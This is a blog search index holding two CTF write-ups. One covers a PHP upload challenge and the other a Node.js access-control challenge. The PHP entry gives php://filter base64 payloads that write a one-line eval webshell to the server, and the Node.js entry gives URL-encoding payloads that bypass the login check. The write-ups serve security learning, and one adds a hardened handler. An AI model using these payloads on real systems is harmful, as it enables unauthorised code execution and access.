search.xml
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Notes on Yet Another Drill (Take 3): PHP Audit</title>
<url>/2021/10/11/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Use for illegal purposes is strictly prohibited; you alone bear all consequences arising from it.</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h4><p>This article records yet another (and another, and another) CTF drill: a PHP code audit challenge~</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>Source Code</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment"># upload www-data rwx</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'path'</span>]) && <span class="keyword">isset</span>($_GET[<span class="string">'data'</span>])) {</span><br><span class="line"> $data = <span class="string">"<?php\ndie('no php');\n?>\n"</span>;</span><br><span class="line"> $content = $data.base64_decode($_GET[<span class="string">'data'</span>]);</span><br><span class="line"> file_put_contents($_GET[<span class="string">'path'</span>], $content);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'OK'</span>;</span><br><span class="line">} <span class="keyword">else</span>{</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>Analysis</h4><p>First, analyze the code. The comment hints at the upload path <code>upload</code>. The script checks whether the GET request carries both the <code>path</code> and <code>data</code> parameters, then calls file_put_contents with the filename taken from the <code>path</code> parameter and the content set to <code><?php\ndie('no php');\n?>\n</code> concatenated with base64_decode of the <code>data</code> parameter.</p>
<h4 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>Initial Idea</h4><p>To get a shell, the <code>die('no php')</code> has to be neutralized.</p>
<h4 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>Key Point of This Challenge</h4><p>The die() function prints a message and exits the current script. It is an alias of the exit() function.</p>
<p>Bypassing die() with php://filter => see phith0n's earlier article, which explains this in detail: <a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">link</a></p>
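<p>A hardened version of the upload handler, added here as an illustration (not code from the original post or the challenge): it shows that the <code>die('no php')</code> prefix is not the control that matters, the attacker-chosen destination path is. The constants <code>UPLOAD_DIR</code> and <code>ALLOWED_EXT</code> and the functions <code>safe_upload_path</code> and <code>handle_upload</code> are assumed names for this example.</p>

```php
<?php
// Added hardening example, not the challenge's own code. The die('no php') prefix
// is not the control that matters: the destination path is attacker-chosen, and a
// php://filter/write=... wrapper on that path can transform the bytes after the
// prefix has been prepended. The fix is to constrain where and what gets written.
// Assumptions: uploads live in ./upload, only a few non-executable extensions are
// allowed, and the directory is served without script execution.

const UPLOAD_DIR  = __DIR__ . '/upload';
const ALLOWED_EXT = ['txt', 'png', 'jpg'];

/** Return an absolute path inside UPLOAD_DIR, or null if the name is unacceptable. */
function safe_upload_path($name)
{
    if (!is_string($name) || $name === '') {
        return null;
    }
    // Reject stream wrappers (php://, ...) and any directory component
    // (upload/x.php, ../x), so only a plain file name is accepted.
    if (strpos($name, '://') !== false || basename($name) !== $name) {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $dir = realpath(UPLOAD_DIR);
    if ($dir === false) {
        return null;
    }
    // A resolved directory plus a bare basename cannot escape $dir.
    return $dir . DIRECTORY_SEPARATOR . $name;
}

/** Handle the request; returns the response body instead of echoing it. */
function handle_upload(array $get)
{
    if (!isset($get['path'], $get['data']) || !is_string($get['data'])) {
        return 'missing parameters';
    }
    $target = safe_upload_path($get['path']);
    if ($target === null) {
        return 'rejected';
    }
    // Strict mode refuses input containing characters outside the base64
    // alphabet instead of silently skipping them.
    $content = base64_decode($get['data'], true);
    if ($content === false) {
        return 'bad base64';
    }
    file_put_contents($target, $content, LOCK_EX);
    return 'OK';
}

if (PHP_SAPI !== 'cli') {
    echo handle_upload($_GET);
}
```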
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>Solution Steps</h4><h5 id="解法一"><a href="#解法一" class="headerlink" title="解法一"></a>Solution 1</h5><p>Try to write a file containing <code><?php phpinfo();?></code></p>
<figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>ctf.xxx.com?path=php:<span class="regexp">//</span>filter<span class="regexp">/write=convert.base64-decode/</span>resource=upload<span class="regexp">/test.php&data=YVBEOXdhSEFnY0dod2FXNW1ieWdwT3o4Kw==</span></span><br></pre></td></tr></table></figure>
<p>An "a" is prepended to PD9waHAgcGhwaW5mbygpOz8+ because, during decoding, the characters <, ?, ;, >, space and so on (7 characters in total) fall outside the base64 alphabet and are ignored, so the only characters actually decoded are "phpdienophp" plus whatever else we pass in.</p>
<p>"phpdienophp" is 11 characters long. Because base64 decodes in groups of 4 bytes, one "a" is added to make it 12 characters. That way "phpdienophp" decodes cleanly, and the base64 of the webshell we append afterwards is decoded correctly as well.</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> phpinfo();<span class="meta">?></span> => PD9waHAgcGhwaW5mbygpOz8+ => aPD9waHAgcGhwaW5mbygpOz8+ => YVBEOXdhSEFnY0dod2FXNW1ieWdwT3o4Kw==</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011132326071.png" alt="image-20211011132326071"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011142654572.png" alt="image-20211011142654572"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011142751873.png" alt="image-20211011142751873"></p>
<p>Write a one-line webshell file <code><?php eval($_POST[1]);?></code></p>
<figure class="highlight vim"><table><tr><td class="code"><pre><span class="line">http://ctf.xxx.<span class="keyword">com</span>?path=php://<span class="built_in">filter</span>/<span class="keyword">write</span>=convert.base64-decode/resource=upload/<span class="keyword">shell</span>.php&data=YVBEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYk1WMHBPejgr</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011132825365.png" alt="image-20211011132825365"></p>
<p>Connect with AntSword and browse for the flag.</p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011143035632.png" alt="image-20211011143035632"></p>
<h5 id="解法二"><a href="#解法二" class="headerlink" title="解法二"></a>Solution 2</h5><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>ctf.xxx.com<span class="regexp">/?path=php:/</span><span class="regexp">/filter/</span>write=string.strip_tags|convert.base64-decode<span class="regexp">/resource=upload/</span>test1245.php&data=UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ==</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011142123931.png" alt="image-20211011142123931"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011141958762.png" alt="image-20211011141958762"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011170414108.png" alt="image-20211011170414108"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a></p>
<p><a href="https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/" target="_blank" rel="noopener">https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/</a></p>
]]></content>
</entry>
<entry>
<title>Notes on Yet Another Drill (Take 2): Node.js</title>
<url>/2021/07/04/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Use for illegal purposes is strictly prohibited; you alone bear all consequences arising from it.</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h4><p>This article records yet another (and another) CTF drill, a Node.js white-box audit challenge. Its basic logic is the same as the previous <a href="https://www.nday.top/2021/06/26/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node/" target="_blank" rel="noopener">Notes on Yet Another CTF Drill: Node.js</a>; it feels like many unintended solutions were found last time, so the conditions have been restricted further~</p>
<h4 id="sourceCode1源码"><a href="#sourceCode1源码" class="headerlink" title="sourceCode1源码"></a>sourceCode1 Source</h4><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">process.on(<span class="string">'uncaughtException'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">err</span>) </span>{</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">'Caught exception: '</span>, err);</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>)</span><br><span class="line"><span class="keyword">var</span> session = <span class="built_in">require</span>(<span class="string">'express-session'</span>);</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">'path'</span>);</span><br><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"><span class="keyword">var</span> marked = <span class="built_in">require</span>(<span class="string">'marked'</span>);</span><br><span class="line"><span class="keyword">var</span> morgan = <span class="built_in">require</span>(<span class="string">'morgan'</span>);</span><br><span class="line"><span class="keyword">var</span> bodyParser = <span class="built_in">require</span>(<span class="string">'body-parser'</span>);</span><br><span class="line"><span class="keyword">var</span> AccessControl = <span class="built_in">require</span>(<span class="string">'express-ip-access-control'</span>);</span><br><span class="line"><span class="keyword">var</span> getflag2 = <span class="built_in">require</span>(<span class="string">'./getflag2'</span>);</span><br><span class="line"><span class="keyword">var</span> getflag3 = <span class="built_in">require</span>(<span class="string">'./getflag3'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> port = process.env.PORT;</span><br><span class="line"><span class="keyword">var</span> app = express()</span><br><span class="line"><span class="keyword">var</span> sourceCode;</span><br><span class="line"></span><br><span class="line">marked.setOptions({</span><br><span class="line"> highlight: <span class="function"><span class="keyword">function</span> (<span class="params">code</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">require</span>(<span class="string">'highlight.js'</span>).highlightAuto(code).value</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line">fs.readFile(<span class="string">'app.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode = marked(markdown);</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">fs.readFile(<span class="string">'package.json'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`json\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> packageData = marked(markdown);</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> options = {</span><br><span class="line"> mode: <span class="string">'allow'</span>,</span><br><span class="line"> denys: [],</span><br><span class="line"> allows: [<span class="string">'10.0.0.6'</span>],</span><br><span class="line"> forceConnectionAddress: <span class="literal">false</span>,</span><br><span class="line"> log: <span class="function"><span class="keyword">function</span> (<span class="params">clientIp, access</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (!access)</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`<span class="subst">${clientIp}</span> denied.`</span>);</span><br><span class="line"> },</span><br><span class="line"> statusCode: <span class="number">404</span>,</span><br><span class="line"> redirectTo: <span class="string">''</span>,</span><br><span class="line"> message: <span class="string">'404 Not Found...Don\'t fuck me Please......'</span></span><br><span class="line">};</span><br><span class="line"></span><br><span class="line">app.use(AccessControl(options));</span><br><span class="line">app.set(<span class="string">'views'</span>, path.join(__dirname, <span class="string">'views'</span>));</span><br><span class="line">app.set(<span class="string">'view engine'</span>, <span class="string">'ejs'</span>);</span><br><span class="line">app.use(express.static(path.join(__dirname, <span class="string">'public'</span>)));</span><br><span class="line">app.use(session({ <span class="attr">secret</span>: <span class="string">'xxx'</span>, <span class="attr">resave</span>: <span class="literal">true</span>, <span class="attr">saveUninitialized</span>: <span class="literal">true</span>, <span class="attr">name</span>: <span class="string">'SID'</span> }));</span><br><span class="line">morgan.format(<span class="string">'ctf'</span>, <span class="string">'[ctf] [:remote-addr/:req[x-forwarded-for]] - ":method :url HTTP/:http-version" :status :res[content-length] ":referrer" ":user-agent"'</span>);</span><br><span class="line">app.use(morgan(<span class="string">'ctf'</span>));</span><br><span class="line">app.use(bodyParser.urlencoded({ <span class="attr">limit</span>: <span class="string">'100mb'</span>, <span class="attr">extended</span>: <span class="literal">true</span>, <span class="attr">parameterLimit</span>: <span class="number">1000000</span> }));</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="comment">// console.log(sourceCode);</span></span><br><span class="line"> res.render(<span class="string">'index'</span>, {<span class="attr">code</span>: sourceCode});</span><br><span class="line">});</span><br><span class="line"><span class="comment">// module info</span></span><br><span class="line">app.get(<span class="string">'/package.json'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> res.render(<span class="string">'index'</span>, { <span class="attr">code</span>: packageData });</span><br><span class="line">});</span><br><span class="line"><span class="comment">// version info page</span></span><br><span class="line">app.get(<span class="string">'/version'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> data = <span class="string">'Node version is: '</span> + process.version;</span><br><span class="line"> res.render(<span class="string">'index'</span>, { <span class="attr">code</span>: data });</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.use(<span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query) && (<span class="keyword">typeof</span> req.session[<span class="string">'username'</span>] == <span class="string">'undefined'</span>)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> next();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"><span class="comment">// new: if the url contains ]* it must be ]= or ][</span></span><br><span class="line"> <span class="keyword">var</span> ch = <span class="regexp">/\]./g</span></span><br><span class="line"> <span class="keyword">var</span> seg = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> ((seg = ch.exec(url)) != <span class="literal">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (seg[<span class="number">0</span>] != <span class="string">']='</span> && seg[<span class="number">0</span>] != <span class="string">']['</span>)</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line"><span class="comment">// new: restriction on __proto__</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'__proto__'</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> res.render(<span class="string">'login'</span>);</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> username = req.body[<span class="string">'username'</span>];</span><br><span class="line"> <span class="keyword">var</span> password = req.body[<span class="string">'password'</span>];</span><br><span class="line"> <span class="keyword">if</span> (username == config.username && password == config.password) {</span><br><span class="line"> req.session[<span class="string">"username"</span>] = <span class="string">"admin"</span>;</span><br><span class="line"> res.send(<span class="string">"login success."</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> res.send(<span class="string">'login failed.'</span>);</span><br><span class="line"> } </span><br><span class="line">});</span><br><span class="line"><span class="comment">// new: getflag1, getflag2, getflag3 split the flag across 3 pages</span></span><br><span class="line">app.get(<span class="string">'/getflag1'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> fs.readFile(<span class="string">'getflag2.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode2 = marked(markdown);</span><br><span class="line"> }</span><br><span class="line"> });</span><br><span class="line"> res.render(<span class="string">'flag'</span>, { <span class="attr">flag</span>: config.flag1, <span class="attr">code</span>: sourceCode2});</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/getflag2'</span>, getflag2);</span><br><span class="line">app.get(<span class="string">'/getflag3'</span>, getflag3);</span><br><span class="line"></span><br><span class="line">app.listen(port, <span class="string">'0.0.0.0'</span>, () => {</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`ctf app listening at http://0.0.0.0:<span class="subst">${port}</span>`</span>);</span><br><span class="line">})</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>Analysis</h4><p>First, analyze the code. It starts by importing some modules; the site root loads and renders the source code; package.json and a Version page expose some version information. In the middle, a middleware uses isProtectUrl to check whether the url contains the relevant characters, together with whether session['username'] is defined, to decide how to handle the request: if the url does not contain the relevant characters or session['username'] is undefined, it redirects to the site root. A login page is defined that accepts a POST with username and password, and assigns the session if they are correct. Pages getflag1, getflag2 and getflag3 are defined, each loading and displaying a flag. The challenge is mainly to request /getflag1, /getflag2 and /getflag3 to view the flag files. The basic logic is the same as the previous <a href="https://www.nday.top/2021/06/26/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node/" target="_blank" rel="noopener">Notes on Yet Another CTF Drill: Node.js</a>~~; it feels like last time produced a lot of unintended solutions (just a guess...), so the conditions were tightened further, making this an upgraded version of last time.</p>
<h4 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>Initial Idea</h4><p>Bypass isProtectUrl(req.originalUrl, req.query)</p>
<h4 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>Key Points of This Challenge</h4><p>req.query is an object containing a property for each query string parameter in the route. If there is none, it defaults to {}; </p>
<p>1. Properties on the prototype chain cannot be retrieved </p>
<p>2. If there is no query string, it is an empty object, with the property value {}.</p>
<p>3. The value between an array <code>[]</code> and the <code>=</code> cannot be retrieved (for example, <code>[]123</code> will not yield 123)</p>
<p>…</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>Solution Steps</h4><p>getflag1 checks whether the url contains <code>__proto__</code> or <code>]*</code>. Based on the behaviour above we can construct <code>getflag1?=/login</code> <code>getflag1?1=1&=/login</code> <code>getflag1?&%5b%5d/login</code> <code>getflag1?[][/login</code> and so on to bypass it</p>
<figure class="highlight groovy"><table><tr><td class="code"><pre><span class="line"><span class="string">https:</span><span class="comment">//xxx.xxx.xxx.com/getflag1?=/login</span></span><br><span class="line">Obtained the first part of the <span class="string">flag:</span> Your flag <span class="string">is:</span> flag{Yeah and sourceCode2</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704134027011.png" alt="image-20210704134027011"></p>
<h5 id="sourceCode2源码"><a href="#sourceCode2源码" class="headerlink" title="sourceCode2源码"></a>sourceCode2 Source</h5><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"><span class="keyword">var</span> marked = <span class="built_in">require</span>(<span class="string">'marked'</span>);</span><br><span class="line"></span><br><span class="line">marked.setOptions({</span><br><span class="line"> highlight: <span class="function"><span class="keyword">function</span> (<span class="params">code</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">require</span>(<span class="string">'highlight.js'</span>).highlightAuto(code).value</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"> <span class="keyword">var</span> ch = <span class="regexp">/\]./g</span></span><br><span class="line"> <span class="keyword">var</span> seg = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"><span class="comment">// if the url contains ]* it must be ]=</span></span><br><span class="line"> <span class="keyword">while</span> ((seg = ch.exec(url)) != <span class="literal">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (seg[<span class="number">0</span>] != <span class="string">']='</span>)</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// new: restriction on __proto__</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'__proto__'</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getflag2</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> fs.readFile(<span class="string">'getflag3.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode3 = marked(markdown);</span><br><span class="line"> }</span><br><span class="line"> });</span><br><span class="line"> res.render(<span class="string">'flag'</span>, { <span class="attr">flag</span>: config.flag2, <span class="attr">code</span>: sourceCode3});</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = getflag2;</span><br></pre></td></tr></table></figure>
<p>getflag2 also checks the url for <code>__proto__</code> and, where <code>]*</code> is present, whether it equals <code>]=</code>. Based on the same behaviour we can construct <code>getflag1?=/login</code> <code>getflag1?1=1&=/login</code> <code>getflag1?&%5b%5d/login</code> and so on to bypass it</p>
<figure class="highlight groovy"><table><tr><td class="code"><pre><span class="line"><span class="string">https:</span><span class="comment">//xxx.xxx.xxx.xxx.com/getflag2?=/login</span></span><br><span class="line">Obtained the second part of the <span class="string">flag:</span> Your flag <span class="string">is:</span> _Yeah_Yeah_You and sourceCode3</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704134108570.png" alt="image-20210704134108570"></p>
<h5 id="sourceCode3源码"><a href="#sourceCode3源码" class="headerlink" title="sourceCode3源码"></a>sourceCode3 Source</h5><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"> <span class="keyword">var</span> ch = <span class="regexp">/\]./g</span></span><br><span class="line"> <span class="keyword">var</span> seg = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"><span class="comment">// if the url contains ]* it must be ]=</span></span><br><span class="line"> <span class="keyword">while</span> ((seg = ch.exec(url)) != <span class="literal">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (seg[<span class="number">0</span>] != <span class="string">']='</span>)</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// new: restrictions on __proto__, ?=, &= etc.</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'__proto__'</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'?='</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'&='</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getflag3</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> res.render(<span class="string">'flag'</span>, { <span class="attr">flag</span>: config.flag3, <span class="attr">code</span>: <span class="string">""</span> });</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = getflag3;</span><br></pre></td></tr></table></figure>
<p>getflag3 checks the URL for <code>__proto__</code>, <code>?=</code> and <code>&=</code>, and wherever the input contains <code>]</code> followed by another character it requires that pair to be <code>]=</code>. All of these checks run on the raw <code>req.originalUrl</code>, whereas <code>req.query</code> is built from the percent-decoded query string, so URL-encoding <code>[]</code> and <code>__proto__</code> hides them from the checks without changing how the query parser treats them. That is the bypass used here.</p>
<p>Local debugging</p>
<p><code>getflag3?&%5b%5d/login</code></p>
